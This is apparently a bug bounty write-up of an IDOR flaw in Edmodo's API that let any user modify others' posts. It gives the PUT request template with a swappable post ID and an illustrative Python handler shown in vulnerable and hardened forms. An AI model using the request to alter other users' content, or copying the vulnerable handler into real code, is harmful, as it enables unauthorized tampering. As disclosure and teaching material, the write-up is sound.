Modifying Any User Posts On Edmodo

This is an IDOR vulnerability disclosed by Arbin Godar on the Edmodo website, which allowed him to modify any user's post.


Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.
Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. Such resources can be database entries belonging to other users, files in the system, and more. This is caused by the fact that the application takes user supplied input and uses it to retrieve an object without performing sufficient authorization checks. (OWASP)

The Request:

PUT /messages/<post_id>.replies_threaded_json?access_token=<Your_Access_Token> HTTP/1.1
Host: api.edmodo.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
DNT: 1
Content-Type: application/json
Referer: https://www.edmodo.com/post
Content-Length: 1109
Origin: https://www.edmodo.com
Connection: keep-alive

So by replacing <post_id> with any user's post ID, he was able to modify that post as if he were its owner: the access token proves who is calling, but the server never checks that the caller owns the post being updated.
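To make the OWASP definition above and this specific finding concrete, here is an added example (not Edmodo's code, and not part of the original post) of an "update post" handler in the IDOR-prone shape beside its hardened form. The in-memory store, the user names, the tokens, and the function names update_post_vulnerable and update_post_hardened are all constructed for illustration; the only thing taken from the report is the pattern of a request that carries an access token plus a caller-supplied post id.

```python
"""Added example: an IDOR-prone "update post" handler beside a hardened one.
Constructed for illustration; not the vendor's code."""
from dataclasses import dataclass


@dataclass
class Post:
    post_id: int
    owner: str  # user id of the post's author
    body: str


# Constructed sample data: two users, each owning one post.
def make_store():
    return {
        101: Post(101, "alice", "Alice's original post"),
        202: Post(202, "bob", "Bob's original post"),
    }


# Constructed access tokens -> user id (stand-in for a session lookup).
TOKENS = {"tok-alice": "alice", "tok-bob": "bob"}


class Unauthorized(Exception):
    """No valid access token: caller is not authenticated."""


class NotFound(Exception):
    """Post missing, or not owned by the caller (deliberately indistinguishable)."""


def user_from_token(token):
    """Authentication: map the access_token to the calling user."""
    try:
        return TOKENS[token]
    except KeyError:
        raise Unauthorized("invalid access_token")


def update_post_vulnerable(store, token, post_id, new_body):
    """The pattern behind the report: the token is checked (who is calling),
    but post_id is trusted as given, so any authenticated user can edit any post."""
    user_from_token(token)          # authentication only
    post = store[post_id]           # direct object reference, no ownership check
    post.body = new_body
    return post


def update_post_hardened(store, token, post_id, new_body):
    """Authorization added: the authenticated caller must own the referenced object."""
    user = user_from_token(token)
    post = store.get(post_id)
    if post is None or post.owner != user:
        # Same error for "does not exist" and "not yours", so the response
        # does not reveal which post ids are valid.
        raise NotFound("post not found")
    post.body = new_body
    return post


if __name__ == "__main__":
    s = make_store()
    print(update_post_vulnerable(s, "tok-bob", 101, "edited by bob"))  # succeeds: IDOR
    s = make_store()
    try:
        update_post_hardened(s, "tok-bob", 101, "edited by bob")
    except NotFound as e:
        print("hardened handler refused:", e)
```

The fix is the single comparison of post.owner against the user derived from the token; the object id in the URL is treated as an untrusted selector, never as proof of access. Returning the same "not found" result for missing and foreign posts keeps the endpoint from doubling as an oracle for which ids exist.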

Video POC

He was just rewarded with swag, which included stickers, a T-shirt, hoodies and mugs.

